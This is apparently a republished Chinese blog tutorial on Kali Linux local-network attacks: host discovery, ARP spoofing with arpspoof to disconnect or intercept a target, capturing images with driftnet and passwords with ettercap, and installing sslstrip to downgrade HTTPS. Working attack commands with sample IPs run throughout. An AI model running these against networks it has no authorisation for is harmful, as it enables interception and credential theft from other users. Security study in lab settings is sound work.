一篇文章带你了解kali局域网攻击
作者:HUTEROX 发布时间:2022-02-21 23:53:35
前言
很久以前的博客才发现,发布一下。
这个系列以后有时间再做。
arp攻击
arp路由链表,感兴趣的自行百度,我的博客我的笔记.
路由指向
介绍两个东西.
echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通
内网扫描
这个在百度上你可以看到很多相关的方式,比如nmap fping
但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.
这里使用netdiscover
当然这里也写几个nmap之类的指令
nmap -PR -sL ip
fping -asg ip
netdiscover -i kali网卡 -r ip(网段)
netdiscover -i eth0 -r 192.168.43.1/30
扫描速度是比较慢的
断网攻击
arpspoof -i kali的网卡 -t 目标地址 目标网卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺骗信息获取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 开始欺骗让数据经过你的电脑
2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉数据包
获取图片
使用工具difinet
difinet -i eth0(网卡)
实际操作:
图片会在那里临时保存
由于网络问题可能会有点卡
获取HTTP连接的密码信息
使用ettercap
其他的操作还是一样的,要开启arp欺骗
ettercap -Tq -i eth0
-T 文本模式 q 安静模式 i 网卡
然后等待即可.不过现在都是https,作用不大
出现中文怎么办,直接赋值中文乱码,之后解码即可
百度搜索url解码
或者直接使用python
中文编码
from urllib.parse import quote,unquote
str1 = '中国'
str2=quote(strl)
print(str2)
解码
print(unquote(str2))
获取HTTPS的密码信息
这个要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3
记住一定要先安装python2
在kali里面python 默认为python2 当然你可以用ln -s 修改一下.
apt install python 这个时候会自动安装python 2.7
然后输入以下指令安装sslstrip
git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install
这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块
pip install pyOpenSSL
来源:https://blog.csdn.net/FUTEROX/article/details/115185933
0
投稿猜你喜欢
- js实现千分符转化function fmoney(s, n){ n = n > 0 && n <= 20 ? n
- python里使用正则表达式的组嵌套实例详解由于组本身是一个完整的正则表达式,所以可以将组嵌套在其他组中,以构建更复杂的表达式。下面的例子,
本文实例为大家分享了tkinter+pygame+spider实现音乐播放器,供大家参考,具体内容如下1.确定页面SongSheet&nbs- 前言最近在用yolov5参加比赛,yolov5的技巧很多,仅仅用来参加比赛,着实有点浪费,所以有必要好好学习一番,在认真学习之前,首先向yo
- 最近在配置mysql服务器需要用到的一些设置,经过测试发现比较不错的配置方案,亮点在最后啊先说一点问题: Mysql中的InnoD
- 如果我有个list,想判断其中的元素是否满一个条件,后面的元素大于或等于前面元素。Python中的写法就比较多了。下面就主要介绍下一般的写法
- 前面学习过Meanshift算法,在观察这个结果标记时,会发现有这样一个问题,如下图:汽车比较远时,用一个很小的窗口就可以把它框住,这是符合
- str='python String function'生成字符串变量str='python String func
- 为了实现挖掘,我们需要开发一个挖掘功能.挖掘功能需要在给定的消息字符串上生成摘要并提供工作证明.让我们在本章讨论这个.消息摘要函数我们将编写
- 简介序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。反序列化中常见的魔
- 目录楔子上传模块至pypi编写模块编译上传楔子我们在安装第三方包的时候,直接一个pip install xxx命令就搞定了,然后pip会去p
- excel写入数据,使用openpyxl库class WriteExcel: def __init__(self,path):
- bcp是SQL Server中负责导入导出数据的一个命令行工具,它是基于DB-Library的,并且能以并行的方式高效地导入导出大批量的数据
- 第一章:日志管理 1.forcing log switchessql> alter system switch logfile;2.f
- 手写数字识别算法import pandas as pdimport numpy as npfrom sklearn.neural_netwo
- 遍历pd.Series的index和value的方法如下,python built-in list的enumerate方法不管用for i,
- 本文实例讲述了python通过索引遍历列表的方法。分享给大家供大家参考。具体如下:python中我们可以通过for循环来遍历列表:colou
- 描述max() 方法返回给定参数的最大值,参数可以为序列。语法以下是 max() 方法的语法:max( x, y, z, .... )参数x
- 在学习redis过程中提到一个缓存击穿的问题, 书中参考的解决方案之一是使用布隆过滤器, 那么就有必要来了解一下什么是布隆过滤器。在参考了许
- 一、前期准备1.设置GPUimport torchfrom torch import nnimport torchvisionfrom to
